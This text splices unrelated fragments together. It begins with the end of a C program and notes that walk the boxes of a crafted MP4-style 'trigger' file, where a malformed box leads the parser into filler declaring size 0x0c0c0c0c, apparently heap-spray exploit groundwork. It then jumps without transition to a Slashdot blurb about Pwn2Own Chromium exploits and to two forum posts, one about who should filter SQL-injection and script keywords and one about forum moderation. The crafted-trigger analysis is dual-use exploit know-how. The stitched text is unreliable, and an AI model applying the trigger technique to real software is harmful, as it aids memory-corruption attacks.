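const size_t TRIGGER_LEN = sizeof TRIGGER;

int main(void)
{
    struct box boxes[8];
    size_t n = walk_boxes(TRIGGER, TRIGGER_LEN, boxes, 8);
    for (size_t i = 0; i < n; i++) {
        const unsigned char *t = (const unsigned char *)boxes[i].type;
        printf("@%-4zu size=%-10u type=%02x%02x%02x%02x%s\n",
               boxes[i].offset, boxes[i].size, t[0], t[1], t[2], t[3],
               boxes[i].truncated ? "  <- does not fit in file" : "");
    }
    return 0;
}
```

The walk shows `ftyp` (24 bytes) followed by a `cprt` box that declares only 13 bytes, so after its 4-byte version/flags field a single byte remains for the box's own fields; everything after that is consumed as further "boxes" assembled from the filler, and the second of those declares a size of 0x0c0c0c0c, far past the end of the file. With the full 2586-dword filler the walk ends at the same box for the same reason.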
  22. Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits

Tackhead writes "Hot on the hooves of Sergey Glazunov's hack 5 minutes into Pwn2Own, an image of an axe-wielding pink pony was the mark of success for a hacker with the handle of Pinkie Pie. Pinkie Pie subtly tweaked Chromium's sandbox design by chaining together three zero-day vulnerabilities, thereby widening his appeal to $60K in prize money, another shot at a job opportunity at the Googleplex, and instantly making Google's $1M Pwnium contest about 20% cooler. (Let the record show that Slashdot was six years ahead of this particular curve, and that April Fool's Day is less than a month away.)"

See: Teen Exploits Three Zero-Day Vulns for $60K Win in Google Chrome Hack Contest | Threat Level | Wired.com
Source: Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits - Slashdot
  23. If I'm a sysadmin, it's not my problem to put in filters for "SeLeCt" or "<script>", because it's not my problem that the programmer can't filter that. Yes, a good sysadmin racks his brain and wastes his time on such things, but it's not his problem. Indeed, there are many vulnerable public scripts, but I still don't see what the sysadmin has to do with it. That's up to the Project Manager and how much money he puts into the project; if he doesn't, they use a public script and "boom", their problem. The sysadmin has to pay attention to his own issues, the server configuration: php.ini, file permissions, which users the processes run under and so on. But often programmers come with requests like "I want 9999 time limit", "I want 9999 max_file_upload" or whatever, without a serious reason, and that's where the problems come from. Since it's the web application that's vulnerable, the programmer is to blame.
  24. You weren't being mocked, I understood the ideas; some give food for thought, others aren't all that practical. We can't delete banned accounts permanently; based on them we can tell whether current members are among us (for example those involved in carding, CCs... whom we don't like). And old accounts don't bother anyone; there are always people who haven't been active in a long time, there are admins who haven't been active in a long time and only show up now and then; deleting those accounts would be ridiculous, we can't force someone to make another account because they haven't logged in for a long time. As for cleaning the forum of useless posts and topics, everything possible is being tried, within the limits of available time. Every day users are banned or topics are moved to the "Trash bin".